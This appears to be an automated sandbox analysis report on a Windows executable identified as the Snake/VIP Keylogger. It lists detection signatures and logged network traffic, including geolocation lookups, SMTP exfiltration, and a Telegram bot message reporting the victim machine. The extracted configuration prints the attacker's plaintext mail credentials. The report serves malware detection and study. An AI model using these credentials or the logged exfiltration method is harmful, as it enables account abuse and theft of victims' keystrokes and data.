0.2.YDg44STseR.exe.2590f20.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32de9:$s1: UnHook 0x32d85:$s2: SetHook 0x32dbe:$s3: CallNextHook 0x32d4d:$s4: _hook
0.2.YDg44STseR.exe.5120000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x311e9:$s1: UnHook 0x31185:$s2: SetHook 0x311be:$s3: CallNextHook 0x3114d:$s4: _hook
Click to see the 62 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 66.29.146.57, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\YDg44STseR.exe, Initiated: true, ProcessId: 3352, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49726

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T02:42:15.827765+0100	2803305	3	Unknown Traffic	192.168.2.8	49707	104.21.112.1	443	TCP
2025-01-11T02:42:17.293624+0100	2803305	3	Unknown Traffic	192.168.2.8	49709	104.21.112.1	443	TCP
2025-01-11T02:42:28.670623+0100	2803305	3	Unknown Traffic	192.168.2.8	49720	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T02:42:13.881941+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49705	193.122.130.0	80	TCP
2025-01-11T02:42:15.272595+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49705	193.122.130.0	80	TCP
2025-01-11T02:42:16.694444+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49708	193.122.130.0	80	TCP
2025-01-11T02:42:19.827326+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49710	193.122.130.0	80	TCP
2025-01-11T02:42:20.460225+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49711	193.122.130.0	80	TCP
2025-01-11T02:42:23.460063+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49713	193.122.130.0	80	TCP
2025-01-11T02:42:25.725818+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49715	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T02:42:31.408440+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	49725	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: YDg44STseR.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "export@besemglda.com", "Password": "Lovelove@123", "Host": "mail.besemglda.com", "Port": "587", "Version": "4.4"}
Source: 0.2.YDg44STseR.exe.5120000.5.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "export@besemglda.com", "Password": "Lovelove@123", "Host": "mail.besemglda.com", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: YDg44STseR.exe	Virustotal: Detection: 54%			Perma Link
Source: YDg44STseR.exe	ReversingLabs: Detection: 79%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: YDg44STseR.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: YDg44STseR.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49706 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49725 version: TLS 1.2

Source:

Binary string: _.pdb source: YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0214F840h	0_2_0214F6A0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0214F840h	0_2_0214F88F
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0214F840h	0_2_0214F901
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061C0D10h	0_2_061C0B30
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061C169Ah	0_2_061C0B30
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CD1DCh	0_2_061CCF30
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CE33Ch	0_2_061CE090
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061C2C34h	0_2_061C2980
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061C31FEh	0_2_061C2DE0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CF8F4h	0_2_061CF648
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CFD4Ch	0_2_061CFAA0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CD634h	0_2_061CD388
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CDA8Ch	0_2_061CD7E0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CDEE4h	0_2_061CDC38
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	0_2_061C0040
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CE794h	0_2_061CE4E8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061C31FEh	0_2_061C312C
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CEBECh	0_2_061CE940
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CF044h	0_2_061CED98
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061C31FEh	0_2_061C2DD6
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 061CF49Ch	0_2_061CF1F0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B96EBh	0_2_063B9418
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B8320h	0_2_063B7FE0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B62E4h	0_2_063B6038
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BC8E9h	0_2_063BC618
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B32B4h	0_2_063B3008
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BF6D9h	0_2_063BF408
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BDB49h	0_2_063BD878
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B370Ch	0_2_063B3460
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B1CFCh	0_2_063B1A50
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BBB21h	0_2_063BB850
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B02ECh	0_2_063B0040
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BE911h	0_2_063BE640
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B3B64h	0_2_063B38B8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BCD81h	0_2_063BCAB0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B2154h	0_2_063B1EA8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BFB71h	0_2_063BF8A0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B0744h	0_2_063B0498
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B673Ch	0_2_063B6490
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B4D2Ch	0_2_063B4A80
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B712Ch	0_2_063B6E80
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B0B9Ch	0_2_063B08F0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B6B96h	0_2_063B68E8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BBFB9h	0_2_063BBCE8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B5184h	0_2_063B4ED8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B7584h	0_2_063B72D8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BEDA9h	0_2_063BEAD8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B55DCh	0_2_063B5330
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B79DCh	0_2_063B7730
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then mov esp, ebp	0_2_063BB11A
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BDFE1h	0_2_063BDD10
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B25ACh	0_2_063B2300
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BF241h	0_2_063BEF70
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B2A04h	0_2_063B2758
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B0FF4h	0_2_063B0D48
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BD219h	0_2_063BCF48
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BB689h	0_2_063BB3B8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B2E5Ch	0_2_063B2BB0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BE479h	0_2_063BE1A8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B144Ch	0_2_063B11A0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B5A34h	0_2_063B5788
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B7E34h	0_2_063B7B88
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BC451h	0_2_063BC180
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B18A4h	0_2_063B15F8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063B5E8Ch	0_2_063B5BE0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 063BD6B1h	0_2_063BD3E0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064263EAh	0_2_06426078
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06426A1Bh	0_2_06426720
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064286CBh	0_2_064283D0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06420311h	0_2_06420040
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06427D3Bh	0_2_06427A40
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06425A19h	0_2_06425748
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642A843h	0_2_0642A548
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06424321h	0_2_06424050
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642D34Bh	0_2_0642D050
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06422C29h	0_2_06422958
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642905Bh	0_2_06428D60
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642BB63h	0_2_0642B868
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06420C41h	0_2_06420970
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642E66Bh	0_2_0642E370
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06427873h	0_2_06427578
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642EFFBh	0_2_0642ED00
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064210D9h	0_2_06420E08
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06428203h	0_2_06427F08
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642AD0Bh	0_2_0642AA10
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064250E9h	0_2_06424E18
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642D813h	0_2_0642D518
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064239F1h	0_2_06423720
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064222F9h	0_2_06422028
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06429523h	0_2_06429228
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642C02Bh	0_2_0642BD30
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06421A09h	0_2_06421738
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642EB33h	0_2_0642E838
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06422791h	0_2_064224C0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642C9BBh	0_2_0642C6C0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642F4C3h	0_2_0642F1C8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06421E7Ah	0_2_06421BD0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064207A9h	0_2_064204D8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642B1D3h	0_2_0642AED8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06425EB1h	0_2_06425BE0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642DCDBh	0_2_0642D9E0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064247B9h	0_2_064244E8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06426EE3h	0_2_06426BE8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064230C1h	0_2_06422DF0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064299EBh	0_2_064296F0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642C4F3h	0_2_0642C1F8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06424C52h	0_2_06424980
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642A37Bh	0_2_0642A080
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06423559h	0_2_06423288
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642CE83h	0_2_0642CB88
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642F98Bh	0_2_0642F690
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06428B93h	0_2_06428898
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06421571h	0_2_064212A0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642B69Bh	0_2_0642B3A0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0642E1A3h	0_2_0642DEA8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06425581h	0_2_064252B0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064273ABh	0_2_064270B0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06423E89h	0_2_06423BB8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06429EB3h	0_2_06429BB8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 064524BBh	0_2_064521C0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0645033Bh	0_2_06450040
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06451B2Bh	0_2_06451830
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06451FF3h	0_2_06451CF8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 0645119Bh	0_2_06450EA0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06451663h	0_2_06451368
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06450803h	0_2_06450508
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then jmp 06450CCCh	0_2_064509D0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_065D50F8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_065D50E9
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_065D1FA9
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_065D1C90
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_065D1C86

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49725 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.8:49726 -> 66.29.146.57:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2011/01/2025%20/%2015:29:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49708 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49710 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49705 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49713 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49715 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49707 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 104.21.112.1:443

Source: global traffic

TCP traffic: 192.168.2.8:49726 -> 66.29.146.57:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49706 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2011/01/2025%20/%2015:29:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
